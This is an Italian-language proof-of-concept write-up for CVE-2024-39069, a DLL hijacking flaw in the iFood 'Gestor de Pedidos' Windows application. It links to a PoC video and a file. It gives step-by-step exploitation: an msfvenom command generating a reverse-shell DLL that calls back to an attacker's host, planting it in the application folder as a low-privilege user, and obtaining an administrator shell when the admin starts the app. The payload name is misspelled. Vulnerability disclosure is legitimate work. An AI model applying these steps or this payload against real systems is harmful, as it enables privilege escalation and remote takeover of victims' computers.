
CVE-2024-39069
Un attaccante inserisce una DLL dannosa chiamata "d3d12.dll" in una directory che viene cercata dall'applicazione prima che venga trovata la DLL legittima "d3d12.dll". Quando l'applicazione viene avviata, carica la DLL dannosa invece di quella legittima, consentendo all'attaccante di eseguire codice arbitrario nel contesto dell'applicazione.
Vendor Homepage: https://gestordepedidos.ifood.com.br/
Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
POC video: https://youtu.be/oMIobV2M0T8
Creare un file dll dannoso su Kali Linux con msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
Trasferire il file 'd3d12.dll' creato dal Kali all'host Windows con accesso utente di basso livello
Spostare il file 'd3d12.dll' creato in 'C:\Gestor de Peddios\d3d12.dll' con accesso utente di basso livello
Quando l'amministratore esegue l'applicazione, otterrai una reverse shell come amministratore